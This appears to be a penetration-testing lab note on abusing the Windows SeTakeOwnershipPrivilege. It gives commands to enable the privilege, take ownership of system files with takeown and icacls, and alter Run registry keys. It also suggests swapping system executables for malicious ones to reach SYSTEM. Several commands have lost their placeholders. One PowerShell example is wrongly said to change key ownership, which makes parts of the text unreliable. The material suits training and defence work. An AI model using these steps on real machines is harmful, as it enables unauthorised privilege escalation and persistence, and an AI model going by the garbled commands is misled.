# SeTakeOwnershipPrivilege #### **What is SeTakeOwnershipPrivilege?** * **SeTakeOwnershipPrivilege** is a Windows privilege that allows users to take ownership of objects, such as files, folders, or registry keys, even if they do not have explicit permissions to do so. Once ownership is taken, the user can modify the object's permissions to grant themselves full control, effectively bypassing access restrictions. * **Key Command:** * `whoami /priv` → Use this command to check if **SeTakeOwnershipPrivilege** is enabled for your user account. #### **Exploiting SeTakeOwnershipPrivilege** If a user has **SeTakeOwnershipPrivilege**, they can take control of sensitive objects like system files or critical processes and modify their permissions to gain access or execute arbitrary commands. Here's how you can exploit this privilege to escalate your privileges: ``` PS C:\htb> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ======================================================= ======== SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled ``` If privilege is disabled, we can enable it using this script ``` PS C:\> Import-Module .\Enable-Privilege.ps1 PS C:\> .\EnableAllTokenPrivs.ps1 PS C:\> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ======================================== ======= SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled ``` ## **1. Taking Ownership of Files or Directories** **SeTakeOwnershipPrivilege** allows you to change ownership of a file or folder, giving you the ability to modify or access restricted files. After taking ownership, you can change its **Discretionary Access Control List (DACL)** to grant yourself full control. **Steps to Exploit SeTakeOwnershipPrivilege on Files:** 1. **Take Ownership of a File or Directory:** Use the `takeown` command to take ownership of a file or directory. **Command:** ```php-template takeown /F ``` Example: ```mathematica takeown /F C:\Windows\System32\drivers\etc\hosts ``` This command changes the ownership of the specified file to your user account. 2. **Grant Yourself Full Control Over the File:** After taking ownership, modify the file's permissions using the `icacls` command to give yourself full control. **Command:** ```php-template icacls /grant :F ``` Example: ```bash icacls C:\Windows\System32\drivers\etc\hosts /grant :F ``` * **/grant** → Grants full control (`F`) over the file to the specified user. 3. **Modify or Access the File:** After granting yourself full control, you can now edit, delete, or access the file as needed. For example, you can now modify sensitive system files like `hosts`, or even replace system executables with malicious ones to gain SYSTEM-level privileges. ## **2. Taking Ownership of Registry Keys** You can also use **SeTakeOwnershipPrivilege** to modify ownership and permissions of critical registry keys, which may allow you to escalate privileges. **Steps to Exploit Registry Keys:** 1. **Take Ownership of a Registry Key:** Use **regedit** or `PowerShell` to change the ownership of a registry key. You can take ownership of sensitive keys such as those related to user accounts, services, or startup configurations. **Example in PowerShell:** ```powershell Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "" -Value "" ``` This changes the ownership of the key, allowing you to modify startup settings or other critical configurations. 2. **Modify Permissions:** After taking ownership, modify the permissions to grant yourself full control. You can now alter the key's values to execute malicious code, start services with SYSTEM privileges, or add new startup entries.